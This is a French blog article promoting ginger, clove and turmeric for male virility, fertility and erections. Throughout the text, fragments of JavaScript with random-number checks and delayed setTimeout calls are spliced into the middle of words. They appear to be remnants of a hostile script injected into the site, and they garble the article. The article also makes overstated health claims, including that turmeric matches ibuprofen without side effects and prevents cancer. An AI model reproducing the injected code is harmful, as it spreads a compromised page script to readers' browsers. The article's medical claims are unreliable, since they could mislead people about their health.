Sexualité: 3 épices pour votre VIRILITÉ

Et si je vous disais que se cachent peut-être dans votre placard 3 des épices les plus bénéfiques pour votre santé et pour votre virilité ?

Qudom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and vous aurez fini de lire ceci, filez vérifier votre étagère à épices, et/ou foncez au magasin bio le plus proche pour vous procurer la meilleure qualité possible de ces 3 merveilles.

  • 1 Le gingembre

Ce bon vieux gingembre a peut-être un peu usurpé sa réputation d’aphrodisiaque, mais il a d’autres raisons d’être fier de lui.

En fait il peut légèrement échauffer les sens, mais c’est surdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout un véritable dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonique, voire un cardio stimulant à forte dose.

Mais là où le gingembre nous surprend vraiment c’est dans le domaine de la fertilité : contre dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute attente les études scientifiques prouvent que le gingembre augmente la fertilité en améliorant la qualité des spermadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozoïdes et la quantité de sperme produit !

  • 2 Le clou de girofle

Autant la réputation du gingembre comme aphrodisiaque est exagérée, autant celle du clou de girofle est sous estimée.

Cette petite fleur séchée a la capacité de réduire de temps de latence entre l’éjaculation et une nouvelle érection.

Elle améliore aussi la fréquence des rapports et le sperformances sexuelles, selon une étude réalisées sur … des souris.

Pour profiter au maximum de ses bienfaits, on peut utiliser le clou de girofle sous formez de tisanes ou de chaï.

Enfin, la star des épices santé :

  • 3 Le curcuma

Le curcuma est un rhizome, comme le gingembre. On peut l’utiliser frais, mais c’est sous forme de poudre qu’on le trouve le plus facilement.

C’est lui qui donne sa couleur aux plats indiens à base de curry et c’est aussi un excellent moyen de teindre vos habits de façon indélébile, que ce soit volontaire ou non.

Cette épice est de plus en plus étudiée par la science et édom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonne dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours plus par son extraordinaire polyvalence.

1 – C’est un excellent anti-inflamadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire.

Des études ont comparé l’effet du curcuma à celui d’un anti inflammadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toires classiques : l’ibuprofène. Résultat, les douleurs étaoent aussi bien soulagé par la plante que par le médicament. Et sans les effets secondaires du second, au contraire !

2 – C’est un antioxydant puissant 

Non seulement il ne fait pas de mal mais en plus, en prévenant le vieillissement cellulaire du aux radicaux libres, le curcuma préserve la santé et la vigueur de l’organisme.

3 – Il aurait des propriétés anti cancer 

Le curcuma serait particulièrement efficace dans la prévention des cancers très masculins que sont le cancer du côlon, et le cancer de la prostate .

Mais surdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout…

4 – Il favorise l’érection !

Oui, il est prouvé que le curcuma favorise la production d’oxyde nitrique, ce gaz sanguin indispensable au phénomène de l’érection et plus largement nécessaire pour une bonne santé cardio vasculaire.

D’après une étude sur le sujet, il suffirait de 80mg de curcumine (le principe actif du curcuma) par jour pendant 30 jours pour augmenter de 40% sa production d’oxyde nitrique !

  • Comment le consommer ?

Pour que la curcumine soit biodisponible il est indispensable qu’elle soit diluée dans l’huile et accompagnée de piment ou de poivre.

Vous pouvez donc,

-soit mélanger 1 cuillère à café de curcuma dans une cuillère à soupe d’huile avec une pincée de piment et l’ajouter à un de vos repas.

-soit acheter un complément concentré en curcumine biodisponible.

  •  
  •  
  •  
  •  
  •  
  • 254
    Partages

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :